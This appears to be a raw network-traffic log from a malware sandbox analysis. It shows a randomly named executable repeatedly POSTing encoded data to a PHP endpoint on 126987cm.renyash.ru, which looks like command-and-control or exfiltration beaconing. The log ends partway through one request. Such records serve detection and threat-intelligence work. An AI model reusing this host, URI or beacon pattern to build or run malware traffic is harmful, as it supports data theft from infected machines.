                                                                                                                                Jan 1, 2025 21:48:02.183559895 CET816INHTTP/1.1 200 OK
                                                                                                                                Date: Wed, 01 Jan 2025 20:48:02 GMT
                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                Connection: keep-alive
                                                                                                                                cf-cache-status: DYNAMIC
                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=rZRhq6YwqXnNBI0yEYTGQYt8N%2BSyihIBgrU99xgERk9%2F6jyAVv7tLfpf9ywYj%2FKqO7FCJSV88M1Z5I7X4gp3HrTL%2BSuSJweXxiZoz%2FKJ%2BdfQNNbekP%2BP9YF%2FMaMVe%2BME25fbZ6xW"}],"group":"cf-nel","max_age":604800}
                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                Server: cloudflare
                                                                                                                                CF-RAY: 8fb55e2b8f4e43c8-EWR
                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=3634&min_rtt=1605&rtt_var=4661&sent=3&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=1417&delivery_rate=81829&cwnd=191&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                                Data Raw: 34 0d 0a 30 56 58 5b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                Data Ascii: 40VX[0


                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                47192.168.2.449838172.67.220.19880180C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exe
                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                Jan 1, 2025 21:48:02.375004053 CET345OUTPOST /VmpipeJavascript_HttpauthLongpollMultiWordpressDle.php HTTP/1.1
                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                                                                Host: 126987cm.renyash.ru
                                                                                                                                Content-Length: 1072
                                                                                                                                Expect: 100-continue
                                                                                                                                Connection: Keep-Alive


                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                48192.168.2.449839172.67.220.19880180C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exe
                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                Jan 1, 2025 21:48:02.542325020 CET345OUTPOST /VmpipeJavascript_HttpauthLongpollMultiWordpressDle.php HTTP/1.1
                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                                                                Host: 126987cm.renyash.ru
                                                                                                                                Content-Length: 1764
                                                                                                                                Expect: 100-continue
                                                                                                                                Connection: Keep-Alive
                                                                                                                                Jan 1, 2025 21:48:02.889879942 CET1764OUTData Raw: 54 54 5b 5f 56 4a 59 50 5d 56 5b 57 54 5b 51 5c 58 53 58 5a 5b 55 57 44 56 59 59 5a 56 5e 5e 58 58 5d 5f 5a 5a 5b 57 54 47 57 5a 5c 57 50 5f 5b 56 53 43 5b 5a 58 51 58 5d 5e 5b 5e 54 51 53 5e 58 5a 58 5c 54 52 5a 53 5d 59 5f 58 58 59 5a 56 5a 5b
                                                                                                                                Data Ascii: TT[_VJYP]V[WT[Q\XSXZ[UWDVYYZV^^XX]_ZZ[WTGWZ\WP_[VSC[ZXQX]^[^TQS^XZX\TRZS]Y_XXYZVZ[QTPYU]TR\S]]URY[GQQW]YT]ZS_P^[ZB[P]Y]V_Z\ZUSAR_WYR]]QX]\PSPP\[Z^[RWTVRZ]Z_^]ZR[S_]PZTQ^_PTVTRV\^[P^UZ[!Y'"/"2"!'35](<$75'=&<.32*!^&%X*
                                                                                                                                Jan 1, 2025 21:48:02.999349117 CET25INHTTP/1.1 100 Continue
                                                                                                                                Jan 1, 2025 21:48:03.177386045 CET972INHTTP/1.1 200 OK
                                                                                                                                Date: Wed, 01 Jan 2025 20:48:03 GMT
                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                Connection: keep-alive
                                                                                                                                cf-cache-status: DYNAMIC
                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=qByOGkQft%2FdU9kQaTu%2Bi1RCOEi0yeC2OtM86fsDTqCHS%2FdZ1ndFqGSY4lgl%2FXPvq%2B2eklmrbdUFIssRZGKviVAPa2z4wV%2F0oJom0VlE%2F6Hg9uppN%2B%2B6npAlwjl%2Bbwcy%2B%2B3ZHGwnN"}],"group":"cf-nel","max_age":604800}
                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                Server: cloudflare
                                                                                                                                CF-RAY: 8fb55e326f13f78d-EWR
                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=3043&min_rtt=1752&rtt_var=3240&sent=3&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=2109&delivery_rate=120800&cwnd=103&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                                Data Raw: 39 38 0d 0a 02 1e 21 57 28 26 2b 55 20 0c 3a 0f 2a 3b 27 5a 31 22 32 58 25 20 29 08 2b 16 24 01 28 11 3b 08 26 2c 2b 04 30 04 31 52 3e 32 3c 59 2b 26 20 5c 05 1b 39 5f 27 00 2f 59 25 05 3e 0b 28 23 23 07 20 11 21 06 29 0d 33 0e 21 3b 29 59 32 06 3d 53 33 39 2e 57 2b 12 0d 5e 3d 0e 20 0e 24 2d 2a 51 0f 16 38 57 28 23 26 11 28 2f 38 13 24 32 2b 00 36 35 00 0d 31 28 23 52 30 39 2a 5c 28 3e 16 09 35 0d 3f 53 26 12 29 02 32 3e 37 55 3a 3a 26 5e 20 01 22 53 02 3f 55 56 0d 0a 30 0d 0a 0d 0a
                                                                                                                                Data Ascii: 98!W(&+U :*;'Z1"2X% )+$(;&,+01R>2<Y+& \9_'/Y%>(## !)3!;)Y2=S39.W+^= $-*Q8W(#&(/8$2+651(#R09*\(>5?S&)2>7U::&^ "S?UV0


                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                49192.168.2.449840172.67.220.19880180C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exe
                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                Jan 1, 2025 21:48:02.680735111 CET345OUTPOST /VmpipeJavascript_HttpauthLongpollMultiWordpressDle.php HTTP/1.1
                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                                                                Host: 126987cm.renyash.ru
                                                                                                                                Content-Length: 1072
                                                                                                                                Expect: 100-continue
                                                                                                                                Connection: Keep-Alive
                                                                                                                                Jan 1, 2025 21:48:03.030379057 CET1072OUTData Raw: 51 56 5b 55 56 4a 59 55 5d 56 5b 57 54 55 51 5e 58 51 58 58 5b 53 57 46 56 59 59 5a 56 5e 5e 58 58 5d 5f 5a 5a 5b 57 54 47 57 5a 5c 57 50 5f 5b 56 53 43 5b 5a 58 51 58 5d 5e 5b 5e 54 51 53 5e 58 5a 58 5c 54 52 5a 53 5d 59 5f 58 58 59 5a 56 5a 5b
                                                                                                                                Data Ascii: QV[UVJYU]V[WTUQ^XQXX[SWFVYYZV^^XX]_ZZ[WTGWZ\WP_[VSC[ZXQX]^[^TQS^XZX\TRZS]Y_XXYZVZ[QTPYU]TR\S]]URY[GQQW]YT]ZS_P^[ZB[P]Y]V_Z\ZUSAR_WYR]]QX]\PSPP\[Z^[RWTVRZ]Z_^]ZR[S_]PZTQ^_PTVTRV\^[P^UZ["'T/Z7"-X">Z%=0!+((46($3*\*)>> '*!^&%X*
                                                                                                                                Jan 1, 2025 21:48:03.153477907 CET25INHTTP/1.1 100 Continue
                                                                                                                                Jan 1, 2025 21:48:03.431189060 CET804INHTTP/1.1 200 OK
                                                                                                                                Date: Wed, 01 Jan 2025 20:48:03 GMT
                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                Connection: keep-alive
                                                                                                                                cf-cache-status: DYNAMIC
                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=GM6LD%2BR1aZFpq1jgk7r%2Fbt0YkJaC70YN4cbdThB9HXJZ69bbja0mMeD8iOX6Vq5SBFcjciJ5vQjDgU4v3%2FS3SjiMzQYRzeb0tSJ9fKkAouyGplZgss7aJ74arTLzWFnGMEuAWBKw"}],"group":"cf-nel","max_age":604800}
                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                Server: cloudflare
                                                                                                                                CF-RAY: 8fb55e336a2defa7-EWR
                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=3758&min_rtt=1958&rtt_var=4335&sent=2&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=1417&delivery_rate=89220&cwnd=160&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                                Data Raw: 34 0d 0a 30 56 58 5b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                Data Ascii: 40VX[0


                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                50192.168.2.449846172.67.220.19880180C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exe
                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                Jan 1, 2025 21:48:03.587295055 CET321OUTPOST /VmpipeJavascript_HttpauthLongpollMultiWordpressDle.php HTTP/1.1
                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                                                                Host: 126987cm.renyash.ru
                                                                                                                                Content-Length: 1072
                                                                                                                                Expect: 100-continue
                                                                                                                                Jan 1, 2025 21:48:03.946969032 CET1072OUTData Raw: 51 55 5b 50 56 47 59 55 5d 56 5b 57 54 54 51 5d 58 57 58 58 5b 5f 57 48 56 59 59 5a 56 5e 5e 58 58 5d 5f 5a 5a 5b 57 54 47 57 5a 5c 57 50 5f 5b 56 53 43 5b 5a 58 51 58 5d 5e 5b 5e 54 51 53 5e 58 5a 58 5c 54 52 5a 53 5d 59 5f 58 58 59 5a 56 5a 5b
                                                                                                                                Data Ascii: QU[PVGYU]V[WTTQ]XWXX[_WHVYYZV^^XX]_ZZ[WTGWZ\WP_[VSC[ZXQX]^[^TQS^XZX\TRZS]Y_XXYZVZ[QTPYU]TR\S]]URY[GQQW]YT]ZS_P^[ZB[P]Y]V_Z\ZUSAR_WYR]]QX]\PSPP\[Z^[RWTVRZ]Z_^]ZR[S_]PZTQ^_PTVTRV\^[P^UZ[!^3<#. >3#;'W(;Q5W031=6&?.$X'*!^&%X*
                                                                                                                                Jan 1, 2025 21:48:04.044361115 CET25INHTTP/1.1 100 Continue
                                                                                                                                Jan 1, 2025 21:48:04.320518017 CET803INHTTP/1.1 200 OK
                                                                                                                                Date: Wed, 01 Jan 2025 20:48:04 GMT
                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                Connection: keep-alive
                                                                                                                                cf-cache-status: DYNAMIC
                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=7v4LciX7xKGRkW9gx47BLt0VWUQKe48LlsUmwZ3g0khIxQ8zJCzP07oy1zoAcBvBjvbBvXC%2FnrAnahZgqChCbs77GeMdadoPaIN0Nij9uz4k2cE8ZCA0AHLcX6tuxiUA01WIy%2BW3"}],"group":"cf-nel","max_age":604800}
                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                Server: cloudflare
                                                                                                                                CF-RAY: 8fb55e38fc2742be-EWR
                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=3141&min_rtt=1604&rtt_var=3676&sent=3&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=1393&delivery_rate=105005&cwnd=212&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                                Data Raw: 34 0d 0a 30 56 58 5b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                Data Ascii: 40VX[0


                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                51192.168.2.449852172.67.220.19880180C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exe
                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                Jan 1, 2025 21:48:04.439456940 CET345OUTPOST /VmpipeJavascript_HttpauthLongpollMultiWordpressDle.php HTTP/1.1
                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                                                                Host: 126987cm.renyash.ru
                                                                                                                                Content-Length: 1072
                                                                                                                                Expect: 100-continue
                                                                                                                                Connection: Keep-Alive
                                                                                                                                Jan 1, 2025 21:48:04.796029091 CET1072OUTData Raw: 51 53 5b 56 56 46 5c 54 5d 56 5b 57 54 55 51 5e 58 55 58 5c 5b 53 57 47 56 59 59 5a 56 5e 5e 58 58 5d 5f 5a 5a 5b 57 54 47 57 5a 5c 57 50 5f 5b 56 53 43 5b 5a 58 51 58 5d 5e 5b 5e 54 51 53 5e 58 5a 58 5c 54 52 5a 53 5d 59 5f 58 58 59 5a 56 5a 5b
                                                                                                                                Data Ascii: QS[VVF\T]V[WTUQ^XUX\[SWGVYYZV^^XX]_ZZ[WTGWZ\WP_[VSC[ZXQX]^[^TQS^XZX\TRZS]Y_XXYZVZ[QTPYU]TR\S]]URY[GQQW]YT]ZS_P^[ZB[P]Y]V_Z\ZUSAR_WYR]]QX]\PSPP\[Z^[RWTVRZ]Z_^]ZR[S_]PZTQ^_PTVTRV\^[P^UZ["0;7%]6+3+5$(B'T68R03.Z>>+8%!^&%X*
                                                                                                                                Jan 1, 2025 21:48:04.882723093 CET25INHTTP/1.1 100 Continue
                                                                                                                                Jan 1, 2025 21:48:05.141120911 CET807INHTTP/1.1 200 OK
                                                                                                                                Date: Wed, 01 Jan 2025 20:48:05 GMT
                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                Connection: keep-alive
                                                                                                                                cf-cache-status: DYNAMIC
                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=gaSO%2BC3wBuAuBbcb37surSernvKckyHnBvIPQB3G8eFq25lRmj1J7nblYwRJxy%2FBU6Rzi39FdFL0ozo4O8B3dXMqsCXmlcZq%2BpA%2BYcWV6PqvuhjRItPDVRZv6c8MHH7NkfYPlY8S"}],"group":"cf-nel","max_age":604800}
                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                Server: cloudflare
                                                                                                                                CF-RAY: 8fb55e3e3a8043ad-EWR
                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=2269&min_rtt=1643&rtt_var=1868&sent=3&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=1417&delivery_rate=219515&cwnd=202&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                                Data Raw: 34 0d 0a 30 56 58 5b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                Data Ascii: 40VX[0


                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                52192.168.2.449862172.67.220.19880180C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exe
                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                Jan 1, 2025 21:48:05.273777008 CET345OUTPOST /VmpipeJavascript_HttpauthLongpollMultiWordpressDle.php HTTP/1.1
                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                                                                Host: 126987cm.renyash.ru
                                                                                                                                Content-Length: 1072
                                                                                                                                Expect: 100-continue
                                                                                                                                Connection: Keep-Alive
                                                                                                                                Jan 1, 2025 21:48:05.624308109 CET1072OUTData Raw: 51 51 5e 54 56 46 5c 55 5d 56 5b 57 54 5e 51 5c 58 5d 58 58 5b 5e 57 42 56 59 59 5a 56 5e 5e 58 58 5d 5f 5a 5a 5b 57 54 47 57 5a 5c 57 50 5f 5b 56 53 43 5b 5a 58 51 58 5d 5e 5b 5e 54 51 53 5e 58 5a 58 5c 54 52 5a 53 5d 59 5f 58 58 59 5a 56 5a 5b
                                                                                                                                Data Ascii: QQ^TVF\U]V[WT^Q\X]XX[^WBVYYZV^^XX]_ZZ[WTGWZ\WP_[VSC[ZXQX]^[^TQS^XZX\TRZS]Y_XXYZVZ[QTPYU]TR\S]]URY[GQQW]YT]ZS_P^[ZB[P]Y]V_Z\ZUSAR_WYR]]QX]\PSPP\[Z^[RWTVRZ]Z_^]ZR[S_]PZTQ^_PTVTRV\^[P^UZ[!_&!/7.".\0.0!](((#%#$*X>&1C>- Z&:!^&%X*/
                                                                                                                                Jan 1, 2025 21:48:05.727385044 CET25INHTTP/1.1 100 Continue
                                                                                                                                Jan 1, 2025 21:48:05.903098106 CET795INHTTP/1.1 200 OK
                                                                                                                                Date: Wed, 01 Jan 2025 20:48:05 GMT
                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                Connection: keep-alive
                                                                                                                                cf-cache-status: DYNAMIC
                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=jdDJwc5Tk32x1L7xHDB814VSAViFk1VDPwB5IA%2Bv66WQRGLPyG6Mh8pxnWUCgmHurAeqWLupRAWtQ8qyj39iX2aq5uneCWThfKw5MVoTsbjlVKxNaY4oNO9hACmkBFGrLn7fEo5g"}],"group":"cf-nel","max_age":604800}
                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                Server: cloudflare
                                                                                                                                CF-RAY: 8fb55e437ad143b9-EWR
                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=3896&min_rtt=2025&rtt_var=4502&sent=2&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=1417&delivery_rate=85897&cwnd=191&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                                Data Raw: 34 0d 0a 30 56 58 5b 0d 0a
                                                                                                                                Data Ascii: 40VX[
                                                                                                                                Jan 1, 2025 21:48:05.991393089 CET5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                Data Ascii: 0


                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                53192.168.2.449869172.67.220.19880180C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exe
                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                Jan 1, 2025 21:48:06.125372887 CET345OUTPOST /VmpipeJavascript_HttpauthLongpollMultiWordpressDle.php HTTP/1.1
                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                                                                Host: 126987cm.renyash.ru
                                                                                                                                Content-Length: 1072
                                                                                                                                Expect: 100-continue
                                                                                                                                Connection: Keep-Alive
                                                                                                                                Jan 1, 2025 21:48:06.530967951 CET1072OUTData Raw: 51 51 5e 52 56 44 59 51 5d 56 5b 57 54 5a 51 5b 58 53 58 5c 5b 53 57 40 56 59 59 5a 56 5e 5e 58 58 5d 5f 5a 5a 5b 57 54 47 57 5a 5c 57 50 5f 5b 56 53 43 5b 5a 58 51 58 5d 5e 5b 5e 54 51 53 5e 58 5a 58 5c 54 52 5a 53 5d 59 5f 58 58 59 5a 56 5a 5b
                                                                                                                                Data Ascii: QQ^RVDYQ]V[WTZQ[XSX\[SW@VYYZV^^XX]_ZZ[WTGWZ\WP_[VSC[ZXQX]^[^TQS^XZX\TRZS]Y_XXYZVZ[QTPYU]TR\S]]URY[GQQW]YT]ZS_P^[ZB[P]Y]V_Z\ZUSAR_WYR]]QX]\PSPP\[Z^[RWTVRZ]Z_^]ZR[S_]PZTQ^_PTVTRV\^[P^UZ["'1'_71!!.$='!?7'P!S'0">&:(&*!^&%X*?
                                                                                                                                Jan 1, 2025 21:48:06.575004101 CET25INHTTP/1.1 100 Continue
                                                                                                                                Jan 1, 2025 21:48:06.878063917 CET806INHTTP/1.1 200 OK
                                                                                                                                Date: Wed, 01 Jan 2025 20:48:06 GMT
                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                Connection: keep-alive
                                                                                                                                cf-cache-status: DYNAMIC
                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=8hIGZjrCv2%2Fa%2Fx0mTIrqFH4ft7Bz3qYNlPb8XL2r7oPZY9nD28qea2SAgLz1BPFkn154tj6f6eq9HkgLEHxi8qCSkhajogGwVfSxxphMY8d7OpKms7k5qGnvnOG%2BaPaEztIMP%2FEt"}],"group":"cf-nel","max_age":604800}
                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                Server: cloudflare
                                                                                                                                CF-RAY: 8fb55e48b82441ec-EWR
                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=3797&min_rtt=1583&rtt_var=5023&sent=3&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=1417&delivery_rate=75643&cwnd=220&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                                Data Raw: 34 0d 0a 30 56 58 5b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                Data Ascii: 40VX[0


                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                54192.168.2.449875172.67.220.19880180C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exe
                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                Jan 1, 2025 21:48:07.021132946 CET345OUTPOST /VmpipeJavascript_HttpauthLongpollMultiWordpressDle.php HTTP/1.1
                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                                                                Host: 126987cm.renyash.ru
                                                                                                                                Content-Length: 1064
                                                                                                                                Expect: 100-continue
                                                                                                                                Connection: Keep-Alive
                                                                                                                                Jan 1, 2025 21:48:07.374140024 CET1064OUTData Raw: 54 51 5e 53 53 40 59 5e 5d 56 5b 57 54 5c 51 53 58 54 58 59 5b 56 57 47 56 59 59 5a 56 5e 5e 58 58 5d 5f 5a 5a 5b 57 54 47 57 5a 5c 57 50 5f 5b 56 53 43 5b 5a 58 51 58 5d 5e 5b 5e 54 51 53 5e 58 5a 58 5c 54 52 5a 53 5d 59 5f 58 58 59 5a 56 5a 5b
                                                                                                                                Data Ascii: TQ^SS@Y^]V[WT\QSXTXY[VWGVYYZV^^XX]_ZZ[WTGWZ\WP_[VSC[ZXQX]^[^TQS^XZX\TRZS]Y_XXYZVZ[QTPYU]TR\S]]URY[GQQW]YT]ZS_P^[ZB[P]Y]V_Z\ZUSAR_WYR]]QX]\PSPP\[Z^[RWTVRZ]Z_^]ZR[S_]PZTQ^_PTVTRV\^[P^UZ["$23[ T=Z6X?['-0#(7V++W!C U$6]*&*<>&!^&%X*
                                                                                                                                Jan 1, 2025 21:48:07.466110945 CET25INHTTP/1.1 100 Continue
                                                                                                                                Jan 1, 2025 21:48:07.720835924 CET804INHTTP/1.1 200 OK
                                                                                                                                Date: Wed, 01 Jan 2025 20:48:07 GMT
                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                Connection: keep-alive
                                                                                                                                cf-cache-status: DYNAMIC
                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=mC5FyvmFQX9tEjfgwCFKH8%2FW7l6Z1%2BUAU4XWd8KtrXLaSi7a1IXDuSHpC8aoVBSvKH7Avv4rGLsPGv6oJq%2Fng7fMKvQBBY1naP4rQIBqmZfTl2OtcfrI7yxYgGT7cvu7NdjisIjC"}],"group":"cf-nel","max_age":604800}
                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                Server: cloudflare
                                                                                                                                CF-RAY: 8fb55e4e58467c8d-EWR
                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=1920&min_rtt=1790&rtt_var=932&sent=3&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1409&delivery_rate=514809&cwnd=184&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                                Data Raw: 34 0d 0a 30 56 58 5b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                Data Ascii: 40VX[0


                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                55192.168.2.449881172.67.220.19880180C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exe
                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                Jan 1, 2025 21:48:07.842525959 CET345OUTPOST /VmpipeJavascript_HttpauthLongpollMultiWordpressDle.php HTTP/1.1
                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                                                                Host: 126987cm.renyash.ru
                                                                                                                                Content-Length: 1072
                                                                                                                                Expect: 100-continue
                                                                                                                                Connection: Keep-Alive
                                                                                                                                Jan 1, 2025 21:48:08.186640978 CET1072OUTData Raw: 51 56 5b 54 53 46 59 5f 5d 56 5b 57 54 55 51 5b 58 50 58 5b 5b 50 57 43 56 59 59 5a 56 5e 5e 58 58 5d 5f 5a 5a 5b 57 54 47 57 5a 5c 57 50 5f 5b 56 53 43 5b 5a 58 51 58 5d 5e 5b 5e 54 51 53 5e 58 5a 58 5c 54 52 5a 53 5d 59 5f 58 58 59 5a 56 5a 5b
                                                                                                                                Data Ascii: QV[TSFY_]V[WTUQ[XPX[[PWCVYYZV^^XX]_ZZ[WTGWZ\WP_[VSC[ZXQX]^[^TQS^XZX\TRZS]Y_XXYZVZ[QTPYU]TR\S]]URY[GQQW]YT]ZS_P^[ZB[P]Y]V_Z\ZUSAR_WYR]]QX]\PSPP\[Z^[RWTVRZ]Z_^]ZR[S_]PZTQ^_PTVTRV\^[P^UZ["$ 2=\!\$[!#S?''T"&$S$#9*9E+> 1:!^&%X*


                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                56192.168.2.449882172.67.220.19880180C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exe
                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                Jan 1, 2025 21:48:08.193043947 CET345OUTPOST /VmpipeJavascript_HttpauthLongpollMultiWordpressDle.php HTTP/1.1
                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                                                                Host: 126987cm.renyash.ru
                                                                                                                                Content-Length: 1788
                                                                                                                                Expect: 100-continue
                                                                                                                                Connection: Keep-Alive
                                                                                                                                Jan 1, 2025 21:48:08.546025991 CET1788OUTData Raw: 51 55 5b 51 56 42 59 5f 5d 56 5b 57 54 55 51 5d 58 54 58 59 5b 50 57 45 56 59 59 5a 56 5e 5e 58 58 5d 5f 5a 5a 5b 57 54 47 57 5a 5c 57 50 5f 5b 56 53 43 5b 5a 58 51 58 5d 5e 5b 5e 54 51 53 5e 58 5a 58 5c 54 52 5a 53 5d 59 5f 58 58 59 5a 56 5a 5b
